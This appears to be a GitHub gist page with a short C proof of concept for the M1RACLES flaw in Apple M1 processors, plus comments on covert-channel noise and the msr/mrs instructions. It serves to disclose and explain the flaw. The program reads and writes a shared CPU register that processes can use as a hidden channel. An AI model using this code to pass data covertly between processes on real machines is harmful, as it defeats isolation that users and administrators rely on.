-
-
Save marcan/52dd78985635bd75ca9b3b5b0ebe1e20 to your computer and use it in GitHub Desktop.
| /* | |
| * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
| * | |
| * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
| * | |
| * Please visit m1racles.com for more information. | |
| * | |
| * Licensed under the MIT license. | |
| */ | |
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <stdlib.h> | |
| int main(int argc, char **argv) | |
| { | |
| uint64_t val; | |
| if (argc > 1) { | |
| val = atoi(argv[1]); | |
| asm("msr s3_5_c15_c10_1, %x0" : : "r"(val)); | |
| } else { | |
| asm("mrs %x0, s3_5_c15_c10_1" : "=r"(val)); | |
| printf("%llu\n", val); | |
| } | |
| return 0; | |
| } |
Hi, why can't a third process just mess with the communication by writing garbage data to the register every time it gets a lock?
It can, but adding noise is not an effective mitigation against covert channel communications, as you can always use error correction.
I see, but atleast it'll lower the data rate significantly, right? Thanks for the quick reply BTW. :)
I see, but atleast it'll lower the data rate significantly, right? Thanks for the quick reply BTW. :)
Proportional to how much time you spend on it. If you peg a CPU core then you could halve the data rate of another CPU core trying to use the channel.
are "msr" and "mrs" supposed to be different? Looking at the code, it seems there is a mistake there. (I don't know ARM assembly)
are "msr" and "mrs" supposed to be different? Looking at the code, it seems there is a mistake there. (I don't know ARM assembly)
Yes, they are.
https://developer.arm.com/documentation/dui0802/a/A64-General-Instructions/MSR--register-
https://developer.arm.com/documentation/dui0802/a/A64-General-Instructions/MRS
Got it. Thanks!
Hi, why can't a third process just mess with the communication by writing garbage data to the register every time it gets a lock?